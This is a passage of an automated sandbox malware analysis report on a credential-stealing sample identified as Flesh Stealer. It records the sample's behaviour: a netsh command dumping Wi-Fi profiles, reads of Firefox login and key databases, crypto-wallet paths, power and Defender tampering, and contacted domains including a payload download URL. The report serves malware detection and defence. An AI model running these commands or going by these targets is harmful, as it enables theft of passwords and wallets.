              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\Desktop\System.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

              Stealing of Sensitive Information

              barindex
              Yara detected Flesh Stealer
              Source: Yara matchFile source: 00000000.00000002.295346194625.00000176A1193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295346194625.00000176A0FCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: System.exe PID: 6804, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: System.exe, 00000000.00000002.295340608074.0000017690A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data Electrum
              Source: System.exe, 00000000.00000002.295340608074.0000017690A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Google Jaxx
              Source: System.exe, 00000000.00000002.295340608074.000001769050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
              Source: System.exe, 00000000.00000002.295340608074.000001769050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2
              Source: System.exe, 00000000.00000002.295340608074.0000017690A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data ExodusWeb3
              Source: System.exe, 00000000.00000002.295340608074.000001769050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: System.exe, 00000000.00000002.295340608074.000001769050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
              Source: System.exe, 00000000.00000002.295340608074.000001769050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\System.exeFile opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Flesh Stealer
              Source: Yara matchFile source: 00000000.00000002.295346194625.00000176A1193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295346194625.00000176A0FCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: System.exe PID: 6804, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Service Execution              		11
              Windows Service              		11
              Windows Service              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory143
              System Information Discovery              		Remote Desktop Protocol2
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager521
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Timestomp              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets351
              Virtualization/Sandbox Evasion              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading              		DCSync1
              System Network Configuration Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1512274 Sample: System.exe Startdate: 17/09/2024 Architecture: WINDOWS Score: 100 74 utka.xyz 2->74 76 43.97.8.0.in-addr.arpa 2->76 78 2 other IPs or domains 2->78 104 Multi AV Scanner detection for domain / URL 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Antivirus detection for URL or domain 2->108 112 10 other signatures 2->112 9 System.exe 14 7 2->9         started        14 gfqyepapamry.exe 2->14         started        signatures3 110 Performs DNS queries to domains with low reputation 74->110 process4 dnsIp5 82 utka.xyz 191.101.104.168, 443, 49759 ASDETUKhttpwwwheficedcomGB Chile 9->82 84 89.23.100.233, 49762, 9003 MAXITEL-ASRU Russian Federation 9->84 86 icanhazip.com 104.16.185.241, 49761, 80 CLOUDFLARENETUS United States 9->86 68 C:\Users\user\AppData\...\zxcvbnmasd.exe, PE32+ 9->68 dropped 70 C:\Users\user\AppData\...\System.exe.log, ASCII 9->70 dropped 114 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->114 116 Found many strings related to Crypto-Wallets (likely being stolen) 9->116 118 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 9->118 126 3 other signatures 9->126 16 zxcvbnmasd.exe 1 2 9->16         started        20 cmd.exe 1 9->20         started        72 C:\Windows\Temp\ubgiupusihqd.sys, PE32+ 14->72 dropped 120 Multi AV Scanner detection for dropped file 14->120 122 Modifies the context of a thread in another process (thread injection) 14->122 124 Adds a directory exclusion to Windows Defender 14->124 128 2 other signatures 14->128 22 powershell.exe 14->22         started        24 svchost.exe 14->24         started        27 cmd.exe 14->27         started        29 10 other processes 14->29 file6 signatures7 process8 dnsIp9 66 C:\ProgramData\...\gfqyepapamry.exe, PE32+ 16->66 dropped 88 Multi AV Scanner detection for dropped file 16->88 90 Uses powercfg.exe to modify the power settings 16->90 92 Adds a directory exclusion to Windows Defender 16->92 94 Modifies power options to not sleep / hibernate 16->94 31 powershell.exe 27 16->31         started        34 cmd.exe 1 16->34         started        36 sc.exe 1 16->36         started        42 12 other processes 16->42 96 Uses netsh to modify the Windows network and firewall settings 20->96 98 Tries to harvest and steal WLAN passwords 20->98 38 netsh.exe 2 20->38         started        44 3 other processes 20->44 100 Loading BitLocker PowerShell Module 22->100 40 conhost.exe 22->40         started        80 142.202.242.43, 443, 49760 1GSERVERSUS Reserved 24->80 102 Query firmware table information (likely to detect VMs) 24->102 46 2 other processes 27->46 48 9 other processes 29->48 file10 signatures11 process12 signatures13 130 Loading BitLocker PowerShell Module 31->130 50 conhost.exe 31->50         started        52 conhost.exe 34->52         started        54 wusa.exe 34->54         started        56 conhost.exe 36->56         started        58 conhost.exe 42->58         started        60 conhost.exe 42->60         started        62 conhost.exe 42->62         started        64 9 other processes 42->64 process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              System.exe100%Joe Sandbox ML
              System.exe68%ReversingLabsByteCode-MSIL.Trojan.Zilla
              System.exe46%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe81%VirustotalBrowse
              C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe88%ReversingLabsWin64.Trojan.MintZard
              C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe88%ReversingLabsWin64.Trojan.MintZard
              C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe81%VirustotalBrowse
              C:\Windows\Temp\ubgiupusihqd.sys5%ReversingLabs
              C:\Windows\Temp\ubgiupusihqd.sys4%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              utka.xyz6%VirustotalBrowse
              pool.hashvault.pro7%VirustotalBrowse
              icanhazip.com1%VirustotalBrowse
              43.97.8.0.in-addr.arpa0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://utka.xyz0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://t.me/FleshStealer0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              http://crl.rootca1.amazontrust.com/rootca1.crl00%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
              http://crl.pki.goog/gtsr1/gtsr1.crl0W0%Avira URL Cloudsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%VirustotalBrowse
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              http://icanhazip.com/0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
              http://icanhazip.compZ0%Avira URL Cloudsafe
              https://utka.xyz2%VirustotalBrowse
              https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%VirustotalBrowse
              https://t.me/FleshStealerpZ0%Avira URL Cloudsafe
              https://t.me/FleshStealer0%VirustotalBrowse
              https://pki.goog/repository/00%Avira URL Cloudsafe
              http://icanhazip.com/1%VirustotalBrowse
              https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
              http://crl.pki.goog/gtsr1/gtsr1.crl0W0%VirustotalBrowse
              http://pki.goog/repo/certs/gtsr1.der040%Avira URL Cloudsafe
              https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              https://pki.goog/repository/00%VirustotalBrowse
              https://www.google.com/images/branding/product/ico/googleg_alldp.ico0%Avira URL Cloudsafe
              https://www.ecosia.org/newtab/0%VirustotalBrowse
              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
              https://www.google.com0%VirustotalBrowse
              http://pki.goog/repo/certs/gtsr1.der040%VirustotalBrowse
              http://x1.c.lencr.org/00%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_alldp.ico1%VirustotalBrowse
              http://x1.i.lencr.org/00%Avira URL Cloudsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%Avira URL Cloudsafe
              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse
              http://www.quovadis.bm00%Avira URL Cloudsafe
              https://ac.ecosia.org/autocomplete?q=0%VirustotalBrowse
              http://x1.c.lencr.org/00%VirustotalBrowse
              http://x1.i.lencr.org/00%VirustotalBrowse
              http://icanhazip.com0%Avira URL Cloudsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%VirustotalBrowse
              https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
              https://utka.xyz/1234.exe100%Avira URL Cloudmalware
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
              https://utka.xyz/1234.exe8%VirustotalBrowse
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
              https://gemini.google.com/app?q=0%Avira URL Cloudsafe
              http://icanhazip.com1%VirustotalBrowse
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              utka.xyz
              		191.101.104.168
              		truetrueunknown
              pool.hashvault.pro
              		142.202.242.45
              		truefalseunknown
              icanhazip.com
              		104.16.185.241
              		truefalseunknown
              43.97.8.0.in-addr.arpa
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://icanhazip.com/false
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://utka.xyz/1234.exetrue
              • 8%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabSystem.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchSystem.exe, 00000000.00000002.295359571793.00000176A94AC000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/ac/?q=System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://utka.xyzSystem.exe, 00000000.00000002.295340608074.0000017690481000.00000004.00000800.00020000.00000000.sdmptrue
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSystem.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://t.me/FleshStealerSystem.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A1359000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0D05000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
